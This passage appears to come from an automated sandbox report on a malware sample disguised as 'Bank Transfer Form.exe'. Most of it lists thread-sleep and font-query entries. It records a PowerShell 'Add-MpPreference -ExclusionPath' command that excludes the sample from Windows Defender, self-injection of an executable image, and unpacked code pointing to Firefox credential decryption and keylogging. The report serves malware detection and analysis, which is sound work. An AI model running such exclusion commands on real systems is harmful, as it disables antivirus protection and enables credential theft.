                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6860Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2603Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeWindow / User API: threadDelayed 1254Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeWindow / User API: threadDelayed 8605Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -239867s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -239750s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -239640s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -239507s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -239405s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -239297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -239187s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -239074s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -238953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -238843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -238734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -238625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -238485s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -238359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -238235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -238109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7440Thread sleep time: -237981s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7424Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7792Thread sleep count: 1254 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -599874s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7792Thread sleep count: 8605 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -599656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -599546s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -599328s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -599218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -599109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -598999s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -598671s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -598343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -598234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -598124s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -598015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -597906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -597796s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -597687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -597575s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -597468s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -597359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -597249s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -597140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -597031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -596920s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -596812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -596703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -596593s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -596474s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -596359s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -596249s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -596140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -596031s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -595921s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -595812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -595703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -595593s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -595484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -595374s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -595265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -595156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -595046s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -594937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -594828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -594718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exe TID: 7788Thread sleep time: -594609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 240000Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239867Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239750Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239640Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239507Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239405Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239297Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239187Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 239074Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238953Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238843Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238734Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238625Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238485Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238359Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238235Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 238109Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 237981Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599874Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599546Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598999Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598671Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598124Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597796Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597575Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597468Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597359Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597249Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597140Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 597031Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596920Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596474Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596249Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596140Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595921Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595812Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595374Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595156Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 595046Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeThread delayed: delay time: 594609Jump to behavior
                Source: Bank Transfer Form.exe, 00000003.00000002.4139170776.00000000015E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllov
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeCode function: 3_2_06F39548 LdrInitializeThunk,LdrInitializeThunk,3_2_06F39548
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.Bank Transfer Form.exe.4990830.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe"
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeMemory written: C:\Users\user\Desktop\Bank Transfer Form.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bank Transfer Form.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeProcess created: C:\Users\user\Desktop\Bank Transfer Form.exe "C:\Users\user\Desktop\Bank Transfer Form.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Users\user\Desktop\Bank Transfer Form.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Bank Transfer Form.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
